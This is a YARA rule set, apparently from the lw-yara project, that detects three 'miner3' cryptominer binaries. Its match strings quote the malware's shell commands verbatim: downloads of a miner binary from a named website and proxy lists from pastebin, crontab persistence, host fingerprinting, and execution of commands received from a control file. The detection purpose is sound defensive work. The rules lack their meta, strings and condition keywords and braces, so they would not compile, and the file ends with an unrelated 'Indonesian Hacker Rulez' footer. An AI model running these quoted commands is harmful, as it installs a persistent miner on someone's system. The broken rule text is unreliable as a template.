Yara Rule Set
Author: Brian Laskowski
Date: 2018-09-30
Identifier: miner3
Reference: https://github.com/Hestat/lw-yara/
/* Rule Set ----------------------------------------------------------------- */
rule infected_09_30_18_kon {
description = "miner3 - file kon"
author = "Brian Laskowski"
reference = "https://github.com/Hestat/lw-yara/"
date = "2018-09-30"
hash1 = "8e14e55e7c89bf67cf67d1f945c55fbbdc92bafbd4113f87c88336da76c7a01b"
$x1 = "var=$(grep . wprx) && var2=$(grep . mip) && curl --socks5 $var -o templistge.txt$var2" fullword ascii
$x2 = "var=$(grep . wprx) && var2=$(grep . mip) && curl --socks5 $var -o config.json$var2" fullword ascii
$x3 = "var=$(grep . wprx) && var2=$(grep . mip) && curl --socks5 $var -o comm.php$var2" fullword ascii
$x4 = "grep -q \"download\" \"comm.php\"; if [ $? -eq 0 ]; then touch download.txt; fi" fullword ascii
$s5 = "curl -o prx http://pastebin.com/raw/i6uHVPMQ ;shuf -n 1 prx > wprx;rm prx;" fullword ascii
$s6 = "var4=$(grep . namic.txt) && var5=$(grep . link.txt) && chmod 0777 $var4 || curl -o $var4 $var5 && chmod 0777 $var4" fullword ascii
$s7 = "var=$(grep . wprx) && var2=$(grep . mip) && curl --socks5 $var$var2" fullword ascii
$s8 = "grep -q \"tasks\" \"comm.php\"; if [ $? -eq 0 ]; then touch ntastk.txt; fi" fullword ascii
$s9 = "grep -q \"imnewww\" \"comm.php\"; if [ $? -eq 0 ]; then touch imnew.txt; fi" fullword ascii
$s10 = "echo \"*/4 * * * * pidof knox || exec $PWD/knox >/dev/null 2>&1 &\" | crontab -" fullword ascii
$s11 = "chmod 0777 knox || wget http://migdalworld.org/wp-includes/images/media/mi/123/123/knox && chmod 0777 knox" fullword ascii
$s12 = "var4=$(grep . namic.txt) && var=$(pidof $var4) && echo $var>pidi.txt && var2=$(grep . pidi.txt) && kill 9 $var2 && rm pidi.txt" fullword ascii
$s13 = "grep -q \"minwor\" \"templistge.txt\"; if [ $? -eq 0 ]; then rm templistge.txt && touch minr_here.txt; else rm templistge.txt; f" ascii
$s14 = "var2=$(grep -Eio \"[^download(].*[^)]\" \"comm.php\") && echo $var2>link.txt && var3=$(grep -Eio \"[^/]*$\" \"link.txt\") && ech" ascii
$s15 = "var2=$(grep -Eio \"[^download(].*[^)]\" \"comm.php\") && echo $var2>link.txt && var3=$(grep -Eio \"[^/]*$\" \"link.txt\") && ech" ascii
$s16 = "download.txt" fullword ascii
$s17 = "curl -V;if [ $? -eq 0 ]; then touch curn.txt;fi;" fullword ascii
$s18 = "var=$(grep . wprx) && var4=$(grep . namic.txt) && var5=$(grep . link.txt) && chmod 0777 $var4 || curl --socks5 $var -o $var4 $va" ascii
$s19 = "var=$(grep . wprx) && var4=$(grep . namic.txt) && var5=$(grep . link.txt) && chmod 0777 $var4 || curl --socks5 $var -o $var4 $va" ascii
$s20 = "var=$(grep . wprx) && var2=$(cat /etc/issue.net | sed 's/ /+/g' | cut -f 4) && var3=$(grep . mip) && curl --socks5 $var \"http:/" ascii
( uint16(0) == 0x457f and
filesize < 40KB and
( 1 of ($x*) and 4 of them )
) or ( all of them )
rule infected_09_30_18_cloki {
description = "miner3 - file cloki"
author = "Brian Laskowski"
reference = "https://github.com/Hestat/lw-yara/"
date = "2018-09-30"
hash1 = "3e7a3c01b4e7134909ec9ced955a82d77606e49d03ae0c25d666fad0b4d80f8f"
$x1 = "grep -q \"download\" \"comm.php\"; if [ $? -eq 0 ]; then touch download.txt; fi" fullword ascii
$s2 = "curl -o prx http://pastebin.com/raw/i6uHVPMQ ;shuf -n 1 prx > wprx;rm prx;" fullword ascii
$s3 = "grep -q \"tasks\" \"comm.php\"; if [ $? -eq 0 ]; then touch ntastk.txt; fi" fullword ascii
$s4 = "grep -q \"imnewww\" \"comm.php\"; if [ $? -eq 0 ]; then touch imnew.txt; fi" fullword ascii
$s5 = "var4=$(cat namic.txt) && var5=$(cat link.txt) && chmod 0777 $var4 || curl -o $var4 $var5 && chmod 0777 $var4" fullword ascii
$s6 = "grep -q \"minwor\" \"templistge.txt\"; if [ $? -eq 0 ]; then rm templistge.txt && touch minr_here.txt; else rm templistge.txt; f" ascii
$s7 = "(cat /var/lib/dbus/machine-id || ifconfig | grep HWaddr || uname -a || lspci ) | md5sum |cut -d\" \" -f1 > udic" fullword ascii
$s8 = "var2=$(grep -Eio \"[^download(].*[^)]\" \"comm.php\") && echo $var2>link.txt && var3=$(grep -Eio \"[^/]*$\" \"link.txt\") && ech" ascii
$s9 = "var2=$(grep -Eio \"[^download(].*[^)]\" \"comm.php\") && echo $var2>link.txt && var3=$(grep -Eio \"[^/]*$\" \"link.txt\") && ech" ascii
$s10 = "rm link* namic* mip* comm* udic* pidi.txt" fullword ascii
$s11 = "var4=$(cat namic.txt) && var=$(pidof $var4) && echo $var>pidi.txt && var2=$(cat pidi.txt) && kill 9 $var2 && rm pidi.txt" fullword ascii
$s12 = "var2=$(grep -Eio \"[^tasks(].*[^)]\" \"comm.php\") && $var2" fullword ascii
$s13 = "download.txt" fullword ascii
$s14 = "curl -V;if [ $? -eq 0 ]; then touch curn.txt;fi;" fullword ascii
$s15 = "var4=$(cat namic.txt) && $PWD/$var4 > /dev/null > /dev/null &" fullword ascii
$s16 = "curl --connect-timeout 10 -o mip inet-ip.info || curl --connect-timeout 10 -o mip icanhazip.com || curl --connect-timeout 10 -o " ascii
$s17 = "curl --connect-timeout 10 -o mip inet-ip.info || curl --connect-timeout 10 -o mip icanhazip.com || curl --connect-timeout 10 -o " ascii
$s18 = "0 -o comH" fullword ascii
$s19 = "imnew.txt" fullword ascii
$s20 = "ntastk.txt" fullword ascii
( uint16(0) == 0x457f and
filesize < 50KB and
( 1 of ($x*) and 4 of them )
) or ( all of them )
rule infected_09_30_18_byte {
description = "miner3 - file byte"
author = "Brian Laskowski"
reference = "https://github.com/Hestat/lw-yara/"
date = "2018-09-30"
hash1 = "ee72b7faaa2618860c96e90768ba8afd39757c4e0614732927b4fbd67a4283b9"
$x1 = "grep -q \"download\" \"comm.php\"; if [ $? -eq 0 ]; then touch download.txt; fi" fullword ascii
$s2 = "curl -o prx http://pastebin.com/raw/bzqUHJg9 ;shuf -n 1 prx > wprx;rm prx;" fullword ascii
$s3 = "-o templistge.txt \"" fullword ascii
$s4 = "grep -q \"tasks\" \"comm.php\"; if [ $? -eq 0 ]; then touch ntastk.txt; fi" fullword ascii
$s5 = "grep -q \"imnewww\" \"comm.php\"; if [ $? -eq 0 ]; then touch imnew.txt; fi" fullword ascii
$s6 = "-o config.json \"" fullword ascii
$s7 = "var4=$(cat namic.txt) && var5=$(cat link.txt) && chmod 0777 $var4 || curl -o $var4 $var5 && chmod 0777 $var4" fullword ascii
$s8 = "grep -q \"minwor\" \"templistge.txt\"; if [ $? -eq 0 ]; then rm templistge.txt && touch minr_here.txt; else rm templistge.txt; f" ascii
$s9 = "-o comm.php \"" fullword ascii
$s10 = "(cat /var/lib/dbus/machine-id || ifconfig | grep HWaddr || uname -a || lspci ) | md5sum |cut -d\" \" -f1 > udic" fullword ascii
$s11 = "var2=$(grep -Eio \"[^download(].*[^)]\" \"comm.php\") && echo $var2>link.txt && var3=$(grep -Eio \"[^/]*$\" \"link.txt\") && ech" ascii
$s12 = "var2=$(grep -Eio \"[^download(].*[^)]\" \"comm.php\") && echo $var2>link.txt && var3=$(grep -Eio \"[^/]*$\" \"link.txt\") && ech" ascii
$s13 = "rm link* namic* mip* comm* udic* pidi.txt" fullword ascii
$s14 = "|| wget http://migdalworld.org/wp-includes/images/media/mi/novys/" fullword ascii
$s15 = "var4=$(cat namic.txt) && var=$(pidof $var4) && echo $var>pidi.txt && var2=$(cat pidi.txt) && kill 9 $var2 && rm pidi.txt" fullword ascii
$s16 = "var2=$(grep -Eio \"[^tasks(].*[^)]\" \"comm.php\") && $var2" fullword ascii
$s17 = "download.txt" fullword ascii
$s18 = "curl -V;if [ $? -eq 0 ]; then touch curn.txt;fi;" fullword ascii
$s19 = "\"" fullword ascii
$s20 = "var4=$(cat namic.txt) && $PWD/$var4 > /dev/null > /dev/null &" fullword ascii
( uint16(0) == 0x457f and
filesize < 50KB and
( 1 of ($x*) and 4 of them )
) or ( all of them )
Copyright 2K16 - 2K18 Indonesian Hacker Rulez